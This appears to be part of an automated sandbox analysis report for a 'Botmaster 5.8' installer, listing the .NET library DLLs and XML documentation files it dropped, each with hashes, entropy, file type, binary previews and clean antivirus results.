                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>Microsoft.Web.WebView2.Core</name>.. </assembly>.. <members>.. <member name="T:Microsoft.Web.WebView2.Core.CoreWebView2">.. <summary>.. WebView2 enables you to host web content using the latest Microsoft Edge browser and web technology... </summary>.. <summary>.. WebView2 enables you to host web content using the latest Microsoft Edge browser and web technology... </summary>.. <summary>.. WebView2 enables you to host web content using the latest Microsoft Edge browser and web technology... </summary>.. <summary>.. WebView2 enables you to host web content using the latest Microsoft Edge browser and web technology... </summary>.. <summary>.. WebView2 enables you to host web content using the latest Microsoft Edge browser and web technology... </summary>.

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.WinForms.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):35280
                                                                                                                                                                                                                Entropy (8bit):6.325467316141879
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:2TFzTl1XWYTAePHZDgcE05P4Jjrnh2jwSosuTv1JKa5/Zi/6LsubIOzXkSLA6XX/:2TFPHXnPHZDgcE05P4JjrnawSosu71JR
                                                                                                                                                                                                                MD5:2FB1A39DCC9F7311CC2F13C8676325C0
                                                                                                                                                                                                                SHA1:780E7501BB4EEC1D29BEF374442F9697F4403A55
                                                                                                                                                                                                                SHA-256:8BABA0E4A72823E75750FE9F3C92EDACD92BF1771CFF353885F79146C018FCCE
                                                                                                                                                                                                                SHA-512:5C5442D5CFE87B53EB500D14536FFA651F0AC8FB33B4F9A7B5AA7ECBD6C3A751F7940C970EBE6CAAC45C99B5C4BA6E647C3826E49E7D6596E09BA501F415C77E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....UI..........." ..0..X...........v... ........... ..............................N.....`..................................u..O....................b...'...........t..8............................................ ............... ..H............text...$V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B.................v......H........3..T=..........(q..@...ht........................................(....*..{....*>..}......}....*..{....*>..}......}....*..{....*>..}......}....*..{....-%..(.....(......(......s....(....}.....{....*..#.......?}.....(....}.....(.....(S......(..... . ...(....*..,..(....,.*.(....,...(.....{....,..{....o......( ...*.0..>.........( .....}............s!...("...........s!...(#....{....,..{...........s!...o$....{....:.....(#......H...s%...o&....(#......G...s'...o(....(#......J

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.WinForms.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):30837
                                                                                                                                                                                                                Entropy (8bit):4.664180944660611
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:3xJyiPmxW3uyCG4yCGdryCP1OQPpRJFXCfPJehIflP3c1VaGrjP+9cIeL3mk1xKe:3xJyiPwW3uyf4yfdry21OQPpRJFXCfPE
                                                                                                                                                                                                                MD5:FC5746829C51E8F61D2E1BA01DE3F39A
                                                                                                                                                                                                                SHA1:9E1B6EAC8974D4C733644313E637C2E4C4A9BD24
                                                                                                                                                                                                                SHA-256:6317641B65D19BFDE590FBB93A3ADBB88C8A2CCA3F5038912D9FC2A18DA3DEE2
                                                                                                                                                                                                                SHA-512:E7EDDB7CA4D66389001E04B01CE6A0C5DA5A792B26309B98C9CDE20F8F67DEC231958337704431C00F216FDADF3BD03DBD2D0454058C3F4DFFBB510763641B20
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>Microsoft.Web.WebView2.WinForms</name>.. </assembly>.. <members>.. <member name="T:Microsoft.Web.WebView2.WinForms.CoreWebView2CreationProperties">.. <summary>.. This class is a bundle of the most common parameters used to create a <see cref="T:Microsoft.Web.WebView2.Core.CoreWebView2Environment"/>... Its main purpose is to be set to <see cref="P:Microsoft.Web.WebView2.WinForms.WebView2.CreationProperties"/> in order to customize the environment used by a <see cref="T:Microsoft.Web.WebView2.WinForms.WebView2"/> during implicit initialization... </summary>.. <remarks>.. This class isn't intended to contain all possible environment customization options... If you need complete control over the environment used by a WebView2 control then you'll need to initialize the control explicitly by.. creating your own environment with <see

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Wpf.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):39848
                                                                                                                                                                                                                Entropy (8bit):6.248013095044449
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:BzXGuETke7fYB3b1K8wDP/ryEH0mBO4JjrDXh2jUfUPLkq7FKKa5/Bi/hGvoAb0m:1X0t7C3JK8wDP/ryEH0mBO4JjrDXaUfV
                                                                                                                                                                                                                MD5:DA51131FDE22E5D412AE475F2CD28142
                                                                                                                                                                                                                SHA1:40D58BC78A29ADE39BDFC3F9BD3EF14ACEBC0306
                                                                                                                                                                                                                SHA-256:BEB930C0EE24EC6DFDA5390E1877EAB80BDFFFC7D582A12105EB8331B0543769
                                                                                                                                                                                                                SHA-512:76B2265EC3896CBDB8F05B7B5E470BC39C474016305E2C2385163E9894E265D8A6604E880F819587C5719E1F9063244218A242737DD902EC6617DF0010132E9C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|............" ..0..p............... ........... ..............................._....`.................................9...O....................x...#..........d...8............................................ ............... ..H............text....n... ...p.................. ..`.rsrc................r..............@..@.reloc...............v..............@..B................m.......H........;...M..............@............................................(....*F.~....(....tP...*6.~.....(....*F.~....(....tP...*6.~.....(....*F.~....(....tP...*6.~.....(....*6.t.....}....*..{....-%..(.....(......(......s....(....}.....{....*..0..........r...p.P...(.........(............s....s....(.........r1..p.P...(.........(............s....s....(.........rO..p.P...(.........(............s....s....(.........**.(.......*..{....*"..}....*&(.......*..{....*"..}....*..0......

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Wpf.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (361), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):73847
                                                                                                                                                                                                                Entropy (8bit):4.693543823168815
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:xxpyIP0mLC4uyD/D4yDC4dryG1fPfyl8h/PbxPOZIaPka4PL1uhui1bKnOCfIPr1:xxpyIP0mLC4uyD/D4yDC4dryG1fPfylB
                                                                                                                                                                                                                MD5:5C6A3A21E42E46AA58DAE2714735D751
                                                                                                                                                                                                                SHA1:EB69BA187ECB40538338CECEB65718D536998046
                                                                                                                                                                                                                SHA-256:B06E9083133388501484CAD2CA6EEDCA452184DC6BF9321316835D45C93682C0
                                                                                                                                                                                                                SHA-512:686B707E895AD2380D7FABF4DCD446DC34EBBA4407C501B888B378B40FBEA1BCE75825B0D5C9C8D0979856E49F43ABB14DBA8F5B23B8EAE044E615A4AD88156F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>Microsoft.Web.WebView2.Wpf</name>.. </assembly>.. <members>.. <member name="T:Microsoft.Web.WebView2.Wpf.CoreWebView2CreationProperties">.. <summary>.. This class is a bundle of the most common parameters used to create a <see cref="T:Microsoft.Web.WebView2.Core.CoreWebView2Environment"/>... Its main purpose is to be set to <see cref="P:Microsoft.Web.WebView2.Wpf.WebView2.CreationProperties"/> in order to customize the environment used by a <see cref="T:Microsoft.Web.WebView2.Wpf.WebView2"/> during implicit initialization... It is also a nice WPF integration utility which allows commonly used environment parameters to be dependency properties and be created and used in markup... </summary>.. <remarks>.. This class isn't intended to contain all possible environment customization options... If you need complete control over the e

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Newtonsoft.Json.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):700336
                                                                                                                                                                                                                Entropy (8bit):5.9289057284451445
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12288:Lf9WGsSVSM2mxL2nRiOr8gUckc6V/g2GhBzj05cH:7XNL2PVh6B+Bzjmc
                                                                                                                                                                                                                MD5:6815034209687816D8CF401877EC8133
                                                                                                                                                                                                                SHA1:1248142EB45EED3BEB0D9A2D3B8BED5FE2569B10
                                                                                                                                                                                                                SHA-256:7F912B28A07C226E0BE3ACFB2F57F050538ABA0100FA1F0BF2C39F1A1F1DA814
                                                                                                                                                                                                                SHA-512:3398094CE429AB5DCDECF2AD04803230669BB4ACCAEF7083992E9B87AFAC55841BA8DEF2A5168358BD17E60799E55D076B0E5CA44C86B9E6C91150D3DC37C721
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... ..............................f*....`.....................................O.......................................T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........z..<&..................<.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{[....3...{Z......(....,...{Z...*..{\.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Newtonsoft.Json.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):707721
                                                                                                                                                                                                                Entropy (8bit):4.633098680643138
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:XqqUmk/RikFaG0rH3jGHdl0/IBHNpgVIeR0R+CRFo9TA82m5Kj+sJjoqoyO185QA:DUn
                                                                                                                                                                                                                MD5:AD1A946CDBE4FC83907CF558FB80A37F
                                                                                                                                                                                                                SHA1:9B6AB559CCCCE89E989259E356C55BE6E370F1DB
                                                                                                                                                                                                                SHA-256:E3C9CB0CBF4B3BE20B6030F3A4872EDD81E042048D2D19732EAC3EEB9779DC0B
                                                                                                                                                                                                                SHA-512:3BBBD262F3FC669BB0709963788CCCA67E17FE28828FF72CA32F1D6D410A3CF76950D126FEB39F204163EB5B43B07F54BC1DD4DF7F4132933DBB61C054E9C1E0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>Newtonsoft.Json</name>.. </assembly>.. <members>.. <member name="T:Newtonsoft.Json.Bson.BsonObjectId">.. <summary>.. Represents a BSON Oid (object id)... </summary>.. </member>.. <member name="P:Newtonsoft.Json.Bson.BsonObjectId.Value">.. <summary>.. Gets or sets the value of the Oid... </summary>.. <value>The value of the Oid.</value>.. </member>.. <member name="M:Newtonsoft.Json.Bson.BsonObjectId.#ctor(System.Byte[])">.. <summary>.. Initializes a new instance of the <see cref="T:Newtonsoft.Json.Bson.BsonObjectId"/> class... </summary>.. <param name="value">The Oid value.</param>.. </member>.. <member name="T:Newtonsoft.Json.Bson.BsonReader">.. <summary>.. Represents a reader that provides fast, non-cached, forward-only access to s

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Buffers.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20856
                                                                                                                                                                                                                Entropy (8bit):6.425485073687783
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:/rMdp9yXOfPfAxR5zwWvYW8a2cyHRN7vCvlbLg:/rMcXP6N6e
                                                                                                                                                                                                                MD5:ECDFE8EDE869D2CCC6BF99981EA96400
                                                                                                                                                                                                                SHA1:2F410A0396BC148ED533AD49B6415FB58DD4D641
                                                                                                                                                                                                                SHA-256:ACCCCFBE45D9F08FFEED9916E37B33E98C65BE012CFFF6E7FA7B67210CE1FEFB
                                                                                                                                                                                                                SHA-512:5FC7FEE5C25CB2EEE19737068968E00A00961C257271B420F594E5A0DA0559502D04EE6BA2D8D2AAD77F3769622F6743A5EE8DAE23F8F993F33FB09ED8DB2741
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ....................................@..................................B..O....`..@...............x#...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Buffers.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (727), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3481
                                                                                                                                                                                                                Entropy (8bit):4.808701688265429
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:1Sm9iVH4cK4bSrh4st9Y9TS7AilqqZw37EeKB+ZPZk:1Sm9iecnWrue8ildZw3QD+ZPZk
                                                                                                                                                                                                                MD5:1C55860DD93297A6EA2FAD2974834C3A
                                                                                                                                                                                                                SHA1:7F4069341C6B62ECFC999A6C2D8A2D5FB59D44F6
                                                                                                                                                                                                                SHA-256:2EC7FB12E11F9831E40524427F6D88A3C9FFDD56CCFA81D373467B75B479A578
                                                                                                                                                                                                                SHA-512:37FA5D4553CA3165F10E2FFEF38FEFC0DBA4A2DBFA05AB9F09AB87B5F71F30E6D965D2F833F58B50B3BC2529EBE8FB5CC431C264F7B47AD026F5C5A874A6ADA1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><doc>.. <assembly>.. <name>System.Buffers</name>.. </assembly>.. <members>.. <member name="T:System.Buffers.ArrayPool`1">.. <summary>Provides a resource pool that enables reusing instances of type <see cref="T[]"></see>.</summary>.. <typeparam name="T">The type of the objects that are in the resource pool.</typeparam>.. </member>.. <member name="M:System.Buffers.ArrayPool`1.#ctor">.. <summary>Initializes a new instance of the <see cref="T:System.Buffers.ArrayPool`1"></see> class.</summary>.. </member>.. <member name="M:System.Buffers.ArrayPool`1.Create">.. <summary>Creates a new instance of the <see cref="T:System.Buffers.ArrayPool`1"></see> class.</summary>.. <returns>A new instance of the <see cref="System.Buffers.ArrayPool`1"></see> class.</returns>.. </member>.. <member name="M:System.Buffers.ArrayPool`1.Create(System.Int32,System.Int32)">.. <summary>Creates a new instance of the <see

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Memory.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):141184
                                                                                                                                                                                                                Entropy (8bit):6.115495759785268
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:IUGrszKKLBFa9DvrJGeesIf3afNs2AldfI:jBFd3/aFs2
                                                                                                                                                                                                                MD5:6FB95A357A3F7E88ADE5C1629E2801F8
                                                                                                                                                                                                                SHA1:19BF79600B716523B5317B9A7B68760AE5D55741
                                                                                                                                                                                                                SHA-256:8E76318E8B06692ABF7DAB1169D27D15557F7F0A34D36AF6463EFF0FE21213C7
                                                                                                                                                                                                                SHA-512:293D8C709BC68D2C980A0DF423741CE06D05FF757077E63986D34CB6459F9623A024D12EF35A280F50D3D516D98ABE193213B9CA71BFDE2A9FE8753B1A6DE2F0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`............@.................................X...O.... ..0................#...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Memory.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13950
                                                                                                                                                                                                                Entropy (8bit):4.749162715500682
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:19SSrAVfjSE0wxiMiLiLiXdCjticiciAiJiziPNjNei5i9zhi+ipOUTJ:1gbXKKXppPmcPi6LmJ
                                                                                                                                                                                                                MD5:ADD19745A43B2515280CE24671863114
                                                                                                                                                                                                                SHA1:CF44E6557FDE93288FF2567A002A69279965CABA
                                                                                                                                                                                                                SHA-256:D5714C96607EB1A9D0F90F57CA194D8A9C3EDE0656A1D1F461E78B209F054813
                                                                                                                                                                                                                SHA-512:8D7E564FA61411B5C28F29B07855DD112687EDCB39B991803C7C7DE67B6894B309102AC9B52409B56B7BB5C9101EB4CDFB21FCFBF5D835E4A153E188CB97CC87
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><doc>.. <assembly>.. <name>System.Memory</name>.. </assembly>.. <members>.. <member name="T:System.Span`1">.. <typeparam name="T"></typeparam>.. </member>.. <member name="M:System.Span`1.#ctor(`0[])">.. <param name="array"></param>.. </member>.. <member name="M:System.Span`1.#ctor(System.Void*,System.Int32)">.. <param name="pointer"></param>.. <param name="length"></param>.. </member>.. <member name="M:System.Span`1.#ctor(`0[],System.Int32)">.. <param name="array"></param>.. <param name="start"></param>.. </member>.. <member name="M:System.Span`1.#ctor(`0[],System.Int32,System.Int32)">.. <param name="array"></param>.. <param name="start"></param>.. <param name="length"></param>.. </member>.. <member name="M:System.Span`1.Clear">.. .. </member>.. <member name="M:System.Span`1.CopyTo(System.Span{`0})">.. <param name="destination"></param>.. </mem

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Numerics.Vectors.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):115856
                                                                                                                                                                                                                Entropy (8bit):5.631610124521223
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:nPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/hV+sUwS:nWw0SUUKBM8aOUiiGw7qa9tK/bJS
                                                                                                                                                                                                                MD5:AAA2CBF14E06E9D3586D8A4ED455DB33
                                                                                                                                                                                                                SHA1:3D216458740AD5CB05BC5F7C3491CDE44A1E5DF0
                                                                                                                                                                                                                SHA-256:1D3EF8698281E7CF7371D1554AFEF5872B39F96C26DA772210A33DA041BA1183
                                                                                                                                                                                                                SHA-512:0B14A039CA67982794A2BB69974EF04A7FBEE3686D7364F8F4DB70EA6259D29640CBB83D5B544D92FA1D3676C7619CD580FF45671A2BB4753ED8B383597C6DA8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ..............................DF....@.................................f...O........................>.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Numerics.Vectors.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):183484
                                                                                                                                                                                                                Entropy (8bit):4.7848212109760935
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:azQgQfMzpKGPqMGFY3lF8YzA2HrYJtJZJ9JaGf4AscoqrbuC4BqaiaIacasa7c1E:azafMDl4LfX3MIg+QDB
                                                                                                                                                                                                                MD5:95DD29CA17B63843AD787D3BC9C8C933
                                                                                                                                                                                                                SHA1:1A937009A92B034EDB168CFAC0EC1C353BE8F58E
                                                                                                                                                                                                                SHA-256:AE2C3DE9AD57D7091D9F44DCDEE3F88ECCF2BA7CB43ADC9BB24769154A532DC7
                                                                                                                                                                                                                SHA-512:8E9397816D3435CCF79F1BF07B482473A7DD3B570BCE003639F2E9FA1C5FE31C4B9400B68F191A36251A59C0253EF9E09039FDD63BA2205D379B3C582E603499
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><doc>.. <assembly>.. <name>System.Numerics.Vectors</name>.. </assembly>.. <members>.. <member name="T:System.Numerics.Matrix3x2">.. <summary>Represents a 3x2 matrix.</summary>.. </member>.. <member name="M:System.Numerics.Matrix3x2.#ctor(System.Single,System.Single,System.Single,System.Single,System.Single,System.Single)">.. <summary>Creates a 3x2 matrix from the specified components.</summary>.. <param name="m11">The value to assign to the first element in the first row.</param>.. <param name="m12">The value to assign to the second element in the first row.</param>.. <param name="m21">The value to assign to the first element in the second row.</param>.. <param name="m22">The value to assign to the second element in the second row.</param>.. <param name="m31">The value to assign to the first element in the third row.</param>.. <param name="m32">The value to assign to the second element in th

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):18024
                                                                                                                                                                                                                Entropy (8bit):6.343772893394079
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:EybU8ndrbbT9NWB2WL/uPHRN7bhlsQVryo:Ey5ndvWbMPVryo
                                                                                                                                                                                                                MD5:C610E828B54001574D86DD2ED730E392
                                                                                                                                                                                                                SHA1:180A7BAAFBC820A838BBACA434032D9D33CCEEBE
                                                                                                                                                                                                                SHA-256:37768488E8EF45729BC7D9A2677633C6450042975BB96516E186DA6CB9CD0DCF
                                                                                                                                                                                                                SHA-512:441610D2B9F841D25494D7C82222D07E1D443B0DA07F0CF735C25EC82F6CCE99A3F3236872AEC38CC4DF779E615D22469666066CCEFED7FE75982EEFADA46396
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ksa...........!.................6... ...@....@.. ....................................@..................................6..K....@..............."..h$...`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................6......H.......D%..<...................P ......................................_...+.'g.......x2..}}...B.O....T...e..?.M..R"M.~pg..c..LD#..y.....y....:u.v*...#.;.-.h.......0..#.....a5|T%W...].!.%'..9.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Runtime.CompilerServices.Unsafe.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20529
                                                                                                                                                                                                                Entropy (8bit):4.731043104619016
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Y/uXukudyvmB0fmkcdZKyQe1EyriJriurs8rsF9vVwFaFDJOeOtOEKFzUxRkj1r:Y/ApEwmafmkcdZbQe1EyriJriurs8rsR
                                                                                                                                                                                                                MD5:C782E92ABBFC0531226F735C6AC56498
                                                                                                                                                                                                                SHA1:2586FDBEB6D1E11D4CECD5B3E8387A18C7B4D350
                                                                                                                                                                                                                SHA-256:39C2D4A63A186D423E9C866F4D3E9A6ACBA0103398F20BAF8B92A38744894215
                                                                                                                                                                                                                SHA-512:A12B6807695C9C626DE9602ABC6DF72BCC5E869A29C7111E956034F321436E7C50EA36ED5EC5B6F93A639AE0F7AEA93953E91AE557BF423A749B036C7252A7B9
                                                                                                                                                                                                                Malicious:false
